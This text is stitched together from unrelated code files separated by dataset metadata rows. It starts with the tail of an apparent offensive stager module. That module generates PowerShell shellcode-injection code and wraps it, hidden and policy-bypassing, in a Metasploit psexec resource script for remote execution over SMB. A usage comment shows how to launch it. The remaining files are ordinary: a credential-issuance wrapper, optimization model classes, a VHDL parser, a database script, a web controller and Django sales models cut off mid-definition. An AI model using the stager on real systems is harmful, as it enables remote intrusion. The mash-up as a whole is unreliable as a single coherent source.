Original concept from Matthew Graeber: http://www.exploit-monday.com/2011/10/exploiting-powershells-features-not.html
Note: the architecture independent invoker was developed independently from
https://www.trustedsec.com/may-2013/native-powershell-x86-shellcode-injection-on-64-bit-platforms/
Port to the msf resource file by @the_grayhound
"""
from modules.common import shellcode
from modules.common import helpers
class Stager:
def __init__(self):
# required
self.shortname = "PsexecVirtualAlloc"
self.description = "PowerShell VirtualAlloc method for inline shellcode injection that makes a Metasploit psexec_command .rc script"
self.rating = "Excellent"
self.language = "powershell"
self.extension = "rc"
self.shellcode = shellcode.Shellcode()
def psRaw(self):
Shellcode = self.shellcode.generate()
Shellcode = ",0".join(Shellcode.split("\\"))[1:]
baseString = """$c = @"
[DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(IntPtr w, uint x, uint y, uint z);
[DllImport("kernel32.dll")] public static extern IntPtr CreateThread(IntPtr u, uint v, IntPtr w, IntPtr x, uint y, IntPtr z);
[DllImport("msvcrt.dll")] public static extern IntPtr memset(IntPtr x, uint y, uint z);
"@
$o = Add-Type -memberDefinition $c -Name "Win32" -namespace Win32Functions -passthru
$x=$o::VirtualAlloc(0,0x1000,0x3000,0x40); [Byte[]]$sc = %s;
for ($i=0;$i -le ($sc.Length-1);$i++) {$o::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1) | out-null;}
$z=$o::CreateThread(0,0,$x,0,0,0); Start-Sleep -Second 100000""" % (Shellcode)
return baseString
def generate(self):
encoded = helpers.deflate(self.psRaw())
rcScript = "use auxiliary/admin/smb/psexec_command\n"
rcScript += "set COMMAND "
rcScript += "if %PROCESSOR_ARCHITECTURE%==x86 ("
rcScript += "powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command \\\"Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(\\\\\\\"%s\\\\\\\")))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();\\\"" % (encoded)
rcScript += ") else ("
rcScript += "%%WinDir%%\\\\syswow64\\\\windowspowershell\\\\v1.0\\\\powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command \\\"Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(\\\\\\\"%s\\\\\\\")))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();\\\")" % (encoded)
return rcScript
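# Editorial usage sketch (assumed Metasploit workflow, not part of the original
# payload module): the string returned by generate() is meant to be saved with
# the .rc extension declared above and loaded as a resource script, e.g.
#   msfconsole -r payload.rc
# after configuring RHOSTS and SMB credentials for psexec_command.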
|
gpl-3.0
| 6,437,733,450,173,481,000
| 45.423729
| 411
| 0.706462
| false
| 3.05692
| false
| false
| false
|
Artemkaaas/indy-sdk
|
vcx/wrappers/python3/vcx/api/issuer_credential.py
|
1
|
17127
|
from ctypes import *
from vcx.common import do_call, create_cb
from vcx.api.connection import Connection
from vcx.api.vcx_stateful import VcxStateful
import json
class IssuerCredential(VcxStateful):
"""
The object of the VCX API representing an Issuer side in the credential issuance process.
Assumes that pairwise connection between Issuer and Holder is already established.
# State
The set of object states and transitions depends on communication method is used.
    The communication method can be specified as a config option in one of the *_init functions. The default communication method is `proprietary`.
proprietary:
VcxStateType::VcxStateInitialized - once `vcx_issuer_create_credential` (create IssuerCredential object) is called.
VcxStateType::VcxStateOfferSent - once `vcx_issuer_send_credential_offer` (send `CRED_OFFER` message) is called.
VcxStateType::VcxStateRequestReceived - once `CRED_REQ` messages is received.
use `vcx_issuer_credential_update_state` or `vcx_issuer_credential_update_state_with_message` functions for state updates.
VcxStateType::VcxStateAccepted - once `vcx_issuer_send_credential` (send `CRED` message) is called.
aries:
VcxStateType::VcxStateInitialized - once `vcx_issuer_create_credential` (create IssuerCredential object) is called.
VcxStateType::VcxStateOfferSent - once `vcx_issuer_send_credential_offer` (send `CredentialOffer` message) is called.
VcxStateType::VcxStateRequestReceived - once `CredentialRequest` messages is received.
VcxStateType::None - once `ProblemReport` messages is received.
use `vcx_issuer_credential_update_state` or `vcx_issuer_credential_update_state_with_message` functions for state updates.
VcxStateType::VcxStateAccepted - once `vcx_issuer_send_credential` (send `Credential` message) is called.
# Transitions
proprietary:
VcxStateType::None - `vcx_issuer_create_credential` - VcxStateType::VcxStateInitialized
VcxStateType::VcxStateInitialized - `vcx_issuer_send_credential_offer` - VcxStateType::VcxStateOfferSent
VcxStateType::VcxStateOfferSent - received `CRED_REQ` - VcxStateType::VcxStateRequestReceived
VcxStateType::VcxStateRequestReceived - `vcx_issuer_send_credential` - VcxStateType::VcxStateAccepted
aries: RFC - https://github.com/hyperledger/aries-rfcs/tree/7b6b93acbaf9611d3c892c4bada142fe2613de6e/features/0036-issue-credential
VcxStateType::None - `vcx_issuer_create_credential` - VcxStateType::VcxStateInitialized
VcxStateType::VcxStateInitialized - `vcx_issuer_send_credential_offer` - VcxStateType::VcxStateOfferSent
VcxStateType::VcxStateOfferSent - received `CredentialRequest` - VcxStateType::VcxStateRequestReceived
VcxStateType::VcxStateOfferSent - received `ProblemReport` - VcxStateType::None
        VcxStateType::VcxStateRequestReceived - `vcx_issuer_send_credential` - VcxStateType::VcxStateAccepted
VcxStateType::VcxStateAccepted - received `Ack` - VcxStateType::VcxStateAccepted
# Messages
proprietary:
CredentialOffer (`CRED_OFFER`)
CredentialRequest (`CRED_REQ`)
Credential (`CRED`)
aries:
CredentialProposal - https://github.com/hyperledger/aries-rfcs/tree/7b6b93acbaf9611d3c892c4bada142fe2613de6e/features/0036-issue-credential#propose-credential
CredentialOffer - https://github.com/hyperledger/aries-rfcs/tree/7b6b93acbaf9611d3c892c4bada142fe2613de6e/features/0036-issue-credential#offer-credential
CredentialRequest - https://github.com/hyperledger/aries-rfcs/tree/7b6b93acbaf9611d3c892c4bada142fe2613de6e/features/0036-issue-credential#request-credential
Credential - https://github.com/hyperledger/aries-rfcs/tree/7b6b93acbaf9611d3c892c4bada142fe2613de6e/features/0036-issue-credential#issue-credential
ProblemReport - https://github.com/hyperledger/aries-rfcs/tree/7b6b93acbaf9611d3c892c4bada142fe2613de6e/features/0035-report-problem#the-problem-report-message-type
Ack - https://github.com/hyperledger/aries-rfcs/tree/master/features/0015-acks#explicit-acks
"""
def __init__(self, source_id: str, attrs: dict, cred_def_id: str, name: str, price: float):
VcxStateful.__init__(self, source_id)
self._cred_def_id = cred_def_id
self._attrs = attrs
self._name = name
self._price = price
def __del__(self):
self.release()
self.logger.debug("Deleted {} obj: {}".format(IssuerCredential, self.handle))
@staticmethod
async def create(source_id: str, attrs: dict, cred_def_handle: int, name: str, price: str):
"""
        Create an Issuer Credential object that provides a credential for an enterprise's user
        Assumes a credential definition has already been written to the ledger.
:param source_id: Tag associated by user of sdk
:param attrs: attributes that will form the credential
:param cred_def_handle: Handle from previously created credential def object
:param name: Name given to the Credential
:param price: Price, in tokens, required as payment for the issuance of the credential.
Example:
source_id = '1'
cred_def_handle = 1
attrs = {'key': 'value', 'key2': 'value2', 'key3': 'value3'}
name = 'Credential Name'
issuer_did = '8XFh8yBzrpJQmNyZzgoTqB'
phone_number = '8019119191'
price = 1
issuer_credential = await IssuerCredential.create(source_id, attrs, cred_def_handle, name, price)
"""
constructor_params = (source_id, attrs, cred_def_handle, name, price)
c_source_id = c_char_p(source_id.encode('utf-8'))
c_cred_def_handle = c_uint32(cred_def_handle)
c_price = c_char_p(price.encode('utf-8'))
# default institution_did in config is used as issuer_did
c_issuer_did = None
c_data = c_char_p(json.dumps(attrs).encode('utf-8'))
c_name = c_char_p(name.encode('utf-8'))
c_params = (c_source_id, c_cred_def_handle, c_issuer_did, c_data, c_name, c_price)
return await IssuerCredential._create("vcx_issuer_create_credential",
constructor_params,
c_params)
@staticmethod
async def deserialize(data: dict):
"""
Create a IssuerCredential object from a previously serialized object
:param data: dict representing a serialized IssuerCredential Object
:return: IssuerCredential object
Example:
source_id = '1'
cred_def_id = 'cred_def_id1'
attrs = {'key': 'value', 'key2': 'value2', 'key3': 'value3'}
name = 'Credential Name'
issuer_did = '8XFh8yBzrpJQmNyZzgoTqB'
phone_number = '8019119191'
price = 1
issuer_credential = await IssuerCredential.create(source_id, attrs, cred_def_id, name, price)
data = await issuer_credential.serialize()
issuer_credential2 = await IssuerCredential.deserialize(data)
"""
issuer_credential = await IssuerCredential._deserialize("vcx_issuer_credential_deserialize",
json.dumps(data),
data.get('data').get('source_id'),
data.get('data').get('price'),
data.get('data').get('credential_attributes'),
data.get('data').get('schema_seq_no'),
data.get('data').get('credential_request'))
return issuer_credential
async def serialize(self) -> dict:
"""
Serializes the issuer credential object for storage and later deserialization.
Example:
source_id = '1'
cred_def_id = 'cred_def_id1'
attrs = {'key': 'value', 'key2': 'value2', 'key3': 'value3'}
name = 'Credential Name'
issuer_did = '8XFh8yBzrpJQmNyZzgoTqB'
phone_number = '8019119191'
price = 1
issuer_credential = await IssuerCredential.create(source_id, attrs, cred_def_id, name, price)
data = await issuer_credential.serialize()
:return: dictionary representing the serialized object
"""
return await self._serialize(IssuerCredential, 'vcx_issuer_credential_serialize')
async def update_state(self) -> int:
"""
Query the agency for the received messages.
Checks for any messages changing state in the object and updates the state attribute.
Example:
issuer_credential = await IssuerCredential.create(source_id, attrs, cred_def_id, name, price)
issuer_credential.update_state()
:return:
"""
return await self._update_state(IssuerCredential, 'vcx_issuer_credential_update_state')
async def update_state_with_message(self, message: str) -> int:
"""
Update the state of the credential based on the given message.
Example:
cred = await IssuerCredential.create(source_id)
assert await cred.update_state_with_message(message) == State.Accepted
:param message: message to process for state changes
:return Current state of the IssuerCredential
"""
return await self._update_state_with_message(IssuerCredential, message, 'vcx_issuer_credential_update_state_with_message')
async def get_state(self) -> int:
"""
Get the current state of the issuer credential object
Example:
issuer_credential = await IssuerCredential.create(source_id, attrs, cred_def_id, name, price)
issuer_credential.update_state()
:return: State of the Object. Possible states:
1 - Initialized
2 - Offer Sent
3 - Request Received
4 - Issued
"""
return await self._get_state(IssuerCredential, 'vcx_issuer_credential_get_state')
def release(self) -> None:
"""
Used to release memory associated with this object, used by the c library.
:return:
"""
self._release(IssuerCredential, 'vcx_issuer_credential_release')
async def send_offer(self, connection: Connection):
"""
Send a credential offer to a holder showing what will be included in the actual credential
:param connection: Connection that identifies pairwise connection
:return: None
Example:
source_id = '1'
cred_def_id = 'cred_def_id1'
attrs = {'key': 'value', 'key2': 'value2', 'key3': 'value3'}
name = 'Credential Name'
issuer_did = '8XFh8yBzrpJQmNyZzgoTqB'
phone_number = '8019119191'
price = 1
issuer_credential = await IssuerCredential.create(source_id, attrs, cred_def_id, name, price)
connection = await Connection.create(source_id)
issuer_credential.send_offer(connection)
"""
if not hasattr(IssuerCredential.send_offer, "cb"):
self.logger.debug("vcx_issuer_send_credential_offer: Creating callback")
IssuerCredential.send_offer.cb = create_cb(CFUNCTYPE(None, c_uint32, c_uint32))
c_credential_handle = c_uint32(self.handle)
c_connection_handle = c_uint32(connection.handle)
await do_call('vcx_issuer_send_credential_offer',
c_credential_handle,
c_connection_handle,
IssuerCredential.send_offer.cb)
async def get_offer_msg(self):
"""
Gets the offer message that can be sent to the specified connection
:param connection: Connection that identifies pairwise connection
:return: None
Example:
source_id = '1'
cred_def_id = 'cred_def_id1'
attrs = {'key': 'value', 'key2': 'value2', 'key3': 'value3'}
name = 'Credential Name'
issuer_did = '8XFh8yBzrpJQmNyZzgoTqB'
phone_number = '8019119191'
price = 1
issuer_credential = await IssuerCredential.create(source_id, attrs, cred_def_id, name, price)
connection = await Connection.create(source_id)
issuer_credential.get_offer_msg(connection)
"""
if not hasattr(IssuerCredential.get_offer_msg, "cb"):
self.logger.debug("vcx_issuer_get_credential_offer_msg: Creating callback")
IssuerCredential.get_offer_msg.cb = create_cb(CFUNCTYPE(None, c_uint32, c_uint32, c_char_p))
c_credential_handle = c_uint32(self.handle)
msg = await do_call('vcx_issuer_get_credential_offer_msg',
c_credential_handle,
IssuerCredential.get_offer_msg.cb)
return json.loads(msg.decode())
async def send_credential(self, connection: Connection):
"""
Sends the credential to the end user (holder).
:param connection: Connection that identifies pairwise connection
:return: None
Example:
credential.send_credential(connection)
"""
if not hasattr(IssuerCredential.send_credential, "cb"):
self.logger.debug("vcx_issuer_send_credential: Creating callback")
IssuerCredential.send_credential.cb = create_cb(CFUNCTYPE(None, c_uint32, c_uint32))
c_credential_handle = c_uint32(self.handle)
c_connection_handle = c_uint32(connection.handle)
await do_call('vcx_issuer_send_credential',
c_credential_handle,
c_connection_handle,
IssuerCredential.send_credential.cb)
async def get_credential_msg(self, my_pw_did: str):
"""
Get the credential to send to the end user (prover).
:param my_pw_did: my pw did associated with person I'm sending credential to
:return: None
Example:
credential.send_credential(connection)
"""
if not hasattr(IssuerCredential.get_credential_msg, "cb"):
self.logger.debug("vcx_issuer_get_credential_msg: Creating callback")
IssuerCredential.get_credential_msg.cb = create_cb(CFUNCTYPE(None, c_uint32, c_uint32, c_char_p))
c_credential_handle = c_uint32(self.handle)
c_my_pw_did = c_char_p(json.dumps(my_pw_did).encode('utf-8'))
msg = await do_call('vcx_issuer_get_credential_msg',
c_credential_handle,
c_my_pw_did,
IssuerCredential.get_credential_msg.cb)
return json.loads(msg.decode())
async def revoke_credential(self):
"""
Revokes a credential.
:return: None
Example:
credential.revoke_credential()
"""
if not hasattr(IssuerCredential.revoke_credential, "cb"):
self.logger.debug("vcx_issuer_revoke_credential: Creating callback")
IssuerCredential.revoke_credential.cb = create_cb(CFUNCTYPE(None, c_uint32, c_uint32))
c_credential_handle = c_uint32(self.handle)
await do_call('vcx_issuer_revoke_credential',
c_credential_handle,
IssuerCredential.revoke_credential.cb)
async def get_payment_txn(self):
"""
        Retrieve the payment transaction associated with this credential. This can be used to get the
        transaction the prover used to pay the issuer, and can be considered a receipt of payment from the
        payer to the issuer.
Example:
txn = credential.get_payment_txn()
:return: payment transaction
{
"amount":25,
"inputs":[
"pay:null:1_3FvPC7dzFbQKzfG",
"pay:null:1_lWVGKc07Pyc40m6"
],
"outputs":[
{"recipient":"pay:null:FrSVC3IrirScyRh","amount":5,"extra":null},
{"recipient":"pov:null:OsdjtGKavZDBuG2xFw2QunVwwGs5IB3j","amount":25,"extra":null}
]
}
"""
if not hasattr(IssuerCredential.get_payment_txn, "cb"):
self.logger.debug("vcx_issuer_credential_get_payment_txn: Creating callback")
IssuerCredential.get_payment_txn.cb = create_cb(CFUNCTYPE(None, c_uint32, c_uint32, c_char_p))
c_credential_handle = c_uint32(self.handle)
payment_txn = await do_call('vcx_issuer_credential_get_payment_txn',
c_credential_handle,
IssuerCredential.get_payment_txn.cb)
return json.loads(payment_txn.decode())
|
apache-2.0
| -1,800,778,143,822,007,800
| 45.667575
| 172
| 0.624803
| false
| 3.860041
| false
| false
| false
|
PythonOptimizers/NLP.py
|
nlp/model/cysparsemodel.py
|
1
|
5725
|
try:
from cysparse.sparse.ll_mat import LLSparseMatrix
import cysparse.common_types.cysparse_types as types
except ImportError:
print "CySparse is not installed!"
from nlp.model.nlpmodel import NLPModel
from nlp.model.snlp import SlackModel
from nlp.model.qnmodel import QuasiNewtonModel
from pykrylov.linop import CysparseLinearOperator
import numpy as np
class CySparseNLPModel(NLPModel):
"""
An `NLPModel` where sparse matrices are returned as CySparse matrices.
The `NLPModel`'s `jac` and `hess` methods should return sparse
Jacobian and Hessian in coordinate format: (vals, rows, cols).
"""
def hess(self, *args, **kwargs):
"""Evaluate Lagrangian Hessian at (x, z).
Note that `rows`, `cols` and `vals` must represent a LOWER triangular
sparse matrix in the coordinate format (COO).
"""
vals, rows, cols = super(CySparseNLPModel, self).hess(*args, **kwargs)
H = LLSparseMatrix(size=self.nvar, size_hint=vals.size,
store_symmetric=True, itype=types.INT64_T,
dtype=types.FLOAT64_T)
H.put_triplet(rows, cols, vals)
return H
def jac(self, *args, **kwargs):
"""Evaluate constraints Jacobian at x."""
vals, rows, cols = super(CySparseNLPModel, self).jac(*args, **kwargs)
J = LLSparseMatrix(nrow=self.ncon, ncol=self.nvar,
size_hint=vals.size, store_symmetric=False,
itype=types.INT64_T, dtype=types.FLOAT64_T)
J.put_triplet(rows, cols, vals)
return J
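# Editorial sketch (illustrative values only): the COO -> LLSparseMatrix pattern
# used by hess()/jac() above amounts to
#   vals = np.array([1.0, 2.0]); rows = np.array([0, 1]); cols = np.array([0, 0])
#   A = LLSparseMatrix(nrow=2, ncol=2, size_hint=vals.size, store_symmetric=False,
#                      itype=types.INT64_T, dtype=types.FLOAT64_T)
#   A.put_triplet(rows, cols, vals)
# i.e. the (rows, cols, vals) triplet is written into an LL-format matrix of the
# appropriate shape.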
try:
from nlp.model.amplmodel import AmplModel
class CySparseAmplModel(CySparseNLPModel, AmplModel):
# MRO: 1. CySparseAmplModel
# 2. CySparseNLPModel
# 3. AmplModel
# 4. NLPModel
#
    # Here, `jac` and `hess` are inherited directly from CySparseNLPModel.
#
def A(self, *args, **kwargs):
"""
Evaluate sparse Jacobian of the linear part of the
constraints. Useful to obtain constraint matrix
when problem is a linear programming problem.
"""
vals, rows, cols = super(CySparseAmplModel, self).A(*args, **kwargs)
A = LLSparseMatrix(nrow=self.ncon, ncol=self.nvar,
size_hint=vals.size, store_symmetric=False,
                               itype=types.INT64_T, dtype=types.FLOAT64_T)
A.put_triplet(rows, cols, vals)
return A
def jop(self, *args, **kwargs):
"""Obtain Jacobian at x as a linear operator."""
return CysparseLinearOperator(self.jac(*args, **kwargs))
except ImportError:
pass
class CySparseSlackModel(SlackModel):
"""
Reformulate an optimization problem using slack variables.
New model represents matrices as `CySparse` matrices.
:parameters:
:model: Original model to be transformed into a slack form.
"""
def __init__(self, model, **kwargs):
if not isinstance(model, CySparseNLPModel):
msg = "The model in `model` should be a CySparseNLPModel"
msg += " or a derived class of it."
raise TypeError(msg)
super(CySparseSlackModel, self).__init__(model)
def _jac(self, x, lp=False):
"""Helper method to assemble the Jacobian matrix.
See the documentation of :meth:`jac` for more information.
The positional argument `lp` should be set to `True` only if the
problem is known to be a linear program. In this case, the evaluation
of the constraint matrix is cheaper and the argument `x` is ignored.
"""
m = self.m
model = self.model
on = self.original_n
lowerC = np.array(model.lowerC, dtype=np.int64)
nlowerC = model.nlowerC
upperC = np.array(model.upperC, dtype=np.int64)
nupperC = model.nupperC
rangeC = np.array(model.rangeC, dtype=np.int64)
nrangeC = model.nrangeC
# Initialize sparse Jacobian
nnzJ = self.model.nnzj + m
J = LLSparseMatrix(nrow=self.ncon, ncol=self.nvar, size_hint=nnzJ,
store_symmetric=False, itype=types.INT64_T,
dtype=types.FLOAT64_T)
# Insert contribution of general constraints
if lp:
J[:on, :on] = self.model.A()
else:
J[:on, :on] = self.model.jac(x[:on])
# Create a few index lists
rlowerC = np.array(range(nlowerC), dtype=np.int64)
rupperC = np.array(range(nupperC), dtype=np.int64)
rrangeC = np.array(range(nrangeC), dtype=np.int64)
# Insert contribution of slacks on general constraints
J.put_triplet(lowerC, on + rlowerC,
-1.0 * np.ones(nlowerC, dtype=np.float64))
J.put_triplet(upperC, on + nlowerC + rupperC,
-1.0 * np.ones(nupperC, dtype=np.float64))
J.put_triplet(rangeC, on + nlowerC + nupperC + rrangeC,
-1.0 * np.ones(nrangeC, dtype=np.float64))
return J
def hess(self, x, z=None, *args, **kwargs):
"""Evaluate Lagrangian Hessian at (x, z)."""
model = self.model
if isinstance(model, QuasiNewtonModel):
return self.hop(x, z, *args, **kwargs)
if z is None:
z = np.zeros(self.m)
on = model.n
H = LLSparseMatrix(size=self.nvar, size_hint=self.model.nnzh,
store_symmetric=True, itype=types.INT64_T,
dtype=types.FLOAT64_T)
H[:on, :on] = self.model.hess(x[:on], z, *args, **kwargs)
return H
|
lgpl-3.0
| -1,697,829,370,414,543,000
| 35.464968
| 80
| 0.591441
| false
| 3.605164
| false
| false
| false
|
jeremiah-c-leary/vhdl-style-guide
|
vsg/vhdlFile/classify/association_element.py
|
1
|
1756
|
from vsg.token import association_element as token
from vsg.vhdlFile import utils
def detect(iCurrent, lObjects):
'''
association_element ::=
[ formal_part => ] actual_part
    An association element will either end in a close parenthesis or a comma that is not within parentheses.
    association_element [)|,]
'''
iOpenParenthesis = 0
iCloseParenthesis = 0
iToken = iCurrent
while not utils.token_is_semicolon(iToken, lObjects):
iToken = utils.find_next_token(iToken, lObjects)
if utils.token_is_open_parenthesis(iToken, lObjects):
iOpenParenthesis += 1
if utils.token_is_close_parenthesis(iToken, lObjects):
iCloseParenthesis += 1
if iCloseParenthesis == iOpenParenthesis + 1:
classify(iCurrent, iToken, lObjects, ')')
return iToken
if iCloseParenthesis == iOpenParenthesis:
if utils.token_is_comma(iToken, lObjects):
classify(iCurrent, iToken, lObjects, ',')
return iToken
iToken += 1
return iToken
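# Editorial worked example (the VHDL fragment is made up for illustration): given
#   port map (clk => sys_clk, data => bus_in(7 downto 0))
# detect() counts parentheses so the comma after sys_clk (seen at depth zero
# inside the map) ends the first element, while the close parenthesis that
# exceeds the open count ends the last one; classify() then tags the tokens
# before '=>' as formal_part, '=>' as assignment, and the rest as actual_part.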
def classify(iStart, iEnd, lObjects, sEnd):
iCurrent = iStart
sPrint = ''
for oObject in lObjects[iStart:iEnd + 1]:
sPrint += oObject.get_value()
# Classify formal part if it exists
if utils.find_in_index_range('=>', iStart, iEnd, lObjects):
iCurrent = utils.assign_tokens_until('=>', token.formal_part, iCurrent, lObjects)
iCurrent = utils.assign_next_token_required('=>', token.assignment, iCurrent, lObjects)
# Classify actual part
for iCurrent in range(iCurrent, iEnd):
if utils.is_item(lObjects, iCurrent):
utils.assign_token(lObjects, iCurrent, token.actual_part)
return iCurrent
|
gpl-3.0
| -9,160,156,864,442,821,000
| 32.769231
| 108
| 0.646355
| false
| 3.605749
| false
| false
| false
|
sivareddyg/UDepLambda
|
scripts/graphquestions/dump_to_database.py
|
1
|
1094
|
import sys
import json
import random
import os
import sqlite3
items = []
for line in sys.stdin:
sent = json.loads(line)
items.append((sent['id'], sent['sentence']))
random.seed(1)
random.shuffle(items)
random.shuffle(items)
random.shuffle(items)
random.shuffle(items)
conn = sqlite3.connect('working/annotations.db')
c = conn.cursor()
# Create table
c.execute('''CREATE TABLE annotators
(email text PRIMARY KEY NOT NULL, name text, salary real DEFAULT 0.0)''')
c.execute('''CREATE TABLE sentences
(sentid INTEGER PRIMARY KEY, qid INTEGER, sentence text NOT NULL, translated integer DEFAULT 0, translation text, startstamp INTEGER DEFAULT 0, endstamp INTEGER, annotator text)''')
for item in items:
# Insert a row of data
value = {}
value['qid'] = item[0]
value['sentence'] = item[1]
c.execute("INSERT INTO sentences (qid,sentence) VALUES (:qid,:sentence);", value)
# Save (commit) the changes
conn.commit()
# We can also close the connection if we are done with it.
# Just be sure any changes have been committed or they will be lost.
conn.close()
|
apache-2.0
| 8,913,069,452,210,691,000
| 27.051282
| 194
| 0.71298
| false
| 3.50641
| false
| false
| false
|
trosa/forca
|
applications/ForCA/controllers/profile.py
|
1
|
2821
|
from operator import itemgetter
@auth.requires_login()
def home():
if auth.has_membership('Professor') and not request.vars:
prof_id = get_prof_id()
redirect(URL(request.application, 'prof', 'home', vars=dict(prof_id=prof_id)))
else:
if request.vars:
aluno_id = request.vars['aluno_id']
else:
aluno_id = get_aluno_id()
request.vars['aluno_id'] = aluno_id
        # Check whether the page is being accessed by the student himself or by someone else
if int(aluno_id) == get_aluno_id():
perfil_proprio = True
else:
perfil_proprio = False
if len(request.args):
page = int(request.args[0])
else:
page = 0
limitby = (page*10, (page+1)*11)
aluno = db(db.alunos.id==aluno_id).select(db.alunos.ALL).first()
avaliacoes = db(db.avaliacoes.aluno_id==aluno_id)
        # Gather statistics about the student's set of evaluations
evals_stats = get_evals_info(avaliacoes)
        # List of the student's most recent evaluations
raw_evals = avaliacoes.select(orderby=~db.avaliacoes.timestamp_eval, limitby=(0,3))
evals = refine_evals(raw_evals)
        # List of the student's most recent evaluations that have been answered
avaliacoes_resp = avaliacoes(Avaliacoes.timestamp_reply!=None)
raw_evals = avaliacoes_resp.select(orderby=~Avaliacoes.timestamp_reply, limitby=(0,3))
evals_replyed = refine_evals(raw_evals)
        # List of the currently logged-in user's favourite evaluations
if perfil_proprio:
#raw_favoritos = db((db.favoritos.user_id==session.auth.user.id)&(db.avaliacoes.id==db.favoritos.avaliacao_id)).select(db.avaliacoes.ALL)
#evals_favorited = refine_evals(raw_favoritos)
evals_favorited = get_favorite_evals(session.auth.user.id)
else:
evals_favorited = []
return dict(aluno=aluno, perfil_proprio=perfil_proprio, user_evals = avaliacoes, evals=evals, evals_replyed=evals_replyed,\
evals_favorited=evals_favorited, evals_stats=evals_stats, page=page, per_page=10)
@auth.requires_membership('Aluno')
def favorites():
if len(request.args):
page = int(request.args[0])
else:
page = 0
limitby = (page*10, (page+1)*11)
# if 'aluno_id' in request.vars:
# user_id = get_aluno_user_id(request.vars['aluno_id'])
# else:
user_id = session.auth.user.id
#favorite_evals = db((Favoritos.user_id==user_id)&(Avaliacoes.id==Favoritos.avaliacao_id)).select(Avaliacoes.ALL, limitby=limitby)
refined_favorites = get_favorite_evals(user_id)
return dict(evals=refined_favorites, page=page, per_page=10)
|
gpl-2.0
| 2,363,282,468,083,769,000
| 39.085714
| 149
| 0.618674
| false
| 2.814443
| false
| false
| false
|
alejo8591/maker
|
sales/models.py
|
1
|
18836
|
# encoding: utf-8
# Copyright 2013 maker
# License
"""
Sales module objects.
"""
from django.db import models
from maker.core.models import Object, User, ModuleSetting
from maker.identities.models import Contact
from maker.finance.models import Transaction, Currency, Tax
from django.core.urlresolvers import reverse
from datetime import datetime, timedelta, time
from dateutil.relativedelta import relativedelta
from time import time as ttime
from decimal import *
class SaleStatus(Object):
"Status of the Sale"
name = models.CharField(max_length = 512)
use_leads = models.BooleanField()
use_opportunities = models.BooleanField()
use_sales = models.BooleanField()
active = models.BooleanField()
hidden = models.BooleanField()
details = models.TextField(blank = True, null = True)
searchable = False
def __unicode__(self):
return unicode(self.name)
def get_absolute_url(self):
"Returns absolute URL"
try:
return reverse('sales_status_view', args=[self.id])
except Exception:
return ""
class Meta:
"SalesStatus"
ordering = ('hidden', '-active', 'name')
class Product(Object):
"Single Product"
name = models.CharField(max_length = 512)
product_type = models.CharField(max_length=32,
default='good',
choices=(('service', 'Service'), ('good', 'Good'),
('subscription', 'Subscription'),
('compound', 'Compound'), ))
parent = models.ForeignKey('self', blank=True, null=True, related_name='child_set')
code = models.CharField(max_length=512, blank=True, null=True)
supplier = models.ForeignKey(Contact, blank=True, null=True, on_delete=models.SET_NULL)
supplier_code = models.IntegerField(blank=True, null=True)
buy_price = models.DecimalField(max_digits=20, decimal_places=2, default=0)
sell_price = models.DecimalField(max_digits=20, decimal_places=2, default=0)
stock_quantity = models.IntegerField(blank=True, null=True)
active = models.BooleanField()
runout_action = models.CharField(max_length=32, blank=True, null=True, choices=(('inactive',
'Mark Inactive'),
('notify', 'Notify'),
('ignore', 'Ignore'), ))
details = models.TextField(blank=True, null=True)
access_inherit = ('parent', '*module', '*user')
def __unicode__(self):
return unicode(self.name)
def get_absolute_url(self):
"Returns absolute URL"
try:
return reverse('sales_product_view', args=[self.id])
except:
return ""
class Meta:
"Product"
ordering = ['code']
class SaleSource(Object):
"Source of Sale e.g. Search Engine"
name = models.CharField(max_length = 512)
active = models.BooleanField(default=False)
details = models.TextField(blank=True, null=True)
searchable = False
def __unicode__(self):
return unicode(self.name)
def get_absolute_url(self):
"Returns absolute URL"
try:
return reverse('sales_source_view', args=[self.id])
except Exception:
return ""
class Meta:
"SaleSource"
ordering = ('-active', 'name')
class Lead(Object):
"Lead"
contact = models.ForeignKey(Contact)
source = models.ForeignKey(SaleSource, blank=True, null=True, on_delete=models.SET_NULL)
products_interested = models.ManyToManyField(Product, blank=True, null=True)
contact_method = models.CharField(max_length=32, choices=(('email', 'E-Mail'), ('phone', 'Phone'),
('post', 'Post'), ('face', 'Face to Face') ))
assigned = models.ManyToManyField(User, related_name = 'sales_lead_assigned', blank=True, null=True)
status = models.ForeignKey(SaleStatus)
details = models.TextField(blank=True, null=True)
access_inherit = ('contact', '*module', '*user')
def __unicode__(self):
return unicode(self.contact.name)
def get_absolute_url(self):
"Returns absolute URL"
try:
return reverse('sales_lead_view', args=[self.id])
except Exception:
return ""
class Meta:
"Lead"
ordering = ['contact']
class Opportunity(Object):
"Opportunity"
lead = models.ForeignKey(Lead, blank=True, null=True, on_delete=models.SET_NULL)
contact = models.ForeignKey(Contact)
products_interested = models.ManyToManyField(Product)
source = models.ForeignKey(SaleSource, blank=True, null=True, on_delete=models.SET_NULL)
expected_date = models.DateField(blank=True, null=True)
closed_date = models.DateField(blank=True, null=True)
assigned = models.ManyToManyField(User, related_name = 'sales_opportunity_assigned', blank=True, null=True)
status = models.ForeignKey(SaleStatus)
probability = models.DecimalField(max_digits=3, decimal_places=0, blank=True, null=True)
amount = models.DecimalField(max_digits=20, decimal_places=2, default=0)
amount_currency = models.ForeignKey(Currency)
amount_display = models.DecimalField(max_digits=20, decimal_places=2, default=0)
details = models.TextField(blank=True, null=True)
access_inherit = ('lead', 'contact', '*module', '*user')
def __unicode__(self):
return unicode(self.contact)
def get_absolute_url(self):
"Returns absolute URL"
try:
return reverse('sales_opportunity_view', args=[self.id])
except Exception:
return ""
class Meta:
"Opportunity"
ordering = ['-expected_date']
class SaleOrder(Object):
"Sale Order"
reference = models.CharField(max_length=512, blank=True, null=True)
datetime = models.DateTimeField(default=datetime.now)
client = models.ForeignKey(Contact, blank=True, null=True, on_delete=models.SET_NULL)
